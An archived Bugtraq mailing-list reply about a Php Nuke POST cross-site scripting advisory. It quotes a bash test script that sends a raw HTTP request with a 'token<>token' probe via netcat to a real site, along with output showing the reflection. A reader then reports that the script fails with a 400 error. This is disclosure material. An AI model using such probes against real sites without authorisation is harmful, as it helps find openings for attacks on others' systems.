Re: Php Nuke POST XSS on steroids

To: ascii <ascii@xxxxxxxxxxxx>
Subject: Re: Php Nuke POST XSS on steroids
From: Paul Laudanski <paul@xxxxxxxxxxxxxx>
Date: Sun, 11 Mar 2007 16:02:38 -0400
Cc: full-disclosure@xxxxxxxxxxxxxxxxx, news@xxxxxxxxxxxxxx, vulnwatch@xxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, vuln@xxxxxxxxxxxxxxxx, webappsec@xxxxxxxxxxxxxxx, Stefano Di Paola <stefano.dipaola@xxxxxxxx>
In-reply-to: <45F18BA5.50500@xxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <45F18BA5.50500@xxxxxxxxxxxx>
User-agent: Thunderbird 1.5.0.10 (Windows/20070221)



ascii wrote:

Php Nuke POST XSS on steroids

 Name              Php Nuke POST XSS on steroids
 Systems Affected  PHP >=4.0.7 <=5.2.1, GLOBALS OFF, Php Nuke 8.0 and
                   others (partially verified)
 Severity          Medium
 Vendor            http://php nuke.org/
 Advisory          http://www.ush.it/2007/03/09/php-nuke-wild-post-xss/
 Authors           Francesco `ascii` Ongaro (ascii@xxxxxx)
                   Stefano `wisec` di Paola (stefano.dipaola@xxxxxxxx)
 Date              20070307
--- >8 --- >8 --- >8 --- >8 --- testsuite.sh --- >8 --- >8 --- >8 --- >8

#!/bin/bash

cat > REQ << TOKEN
POST /modules.php?name=Downloads&d_op=search&query= HTTP/1.1
Host: www.phpnuke.org
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2)
Gecko/20070220 Firefox/2.0.0.2
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://www.phpnuke.org/modules.php?name=Downloads
Cookie: lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

query=token<>token

TOKEN

cat REQ | nc www.phpnuke.org 80 -vvv

--- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8

$ ./testcase | grep "token<>token"
DNS fwd/rev mismatch: www.phpnuke.org != ev1s-67-15-16-43.ev1servers.net
www.phpnuke.org [67.15.16.43] 80 (http) open
<form
action="modules.php?name=Downloads&amp;d_op=search&amp;query=token<>toke

Regards,
Francesco `ascii` Ongaro
http://www.ush.it/

I tried both your scripts at a few locations, and all I get back is this:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Request header field is missing ':' separator.<br />
<pre>
Gecko/20070220 Firefox/2.0.0.2</pre>
</p>
</body></html>

Follow-Ups:
- Re: Php Nuke POST XSS on steroids
  - From: ascii

References:
- Php Nuke POST XSS on steroids
  - From: ascii

Prev by Date: Re: Php Nuke POST XSS on steroids
Next by Date: AssetMan 2.4a <= (download_pdf.php) Remote File Disclosure Vulnerability
Previous by thread: Php Nuke POST XSS on steroids
Next by thread: Re: Php Nuke POST XSS on steroids
Index(es):
- Date
- Thread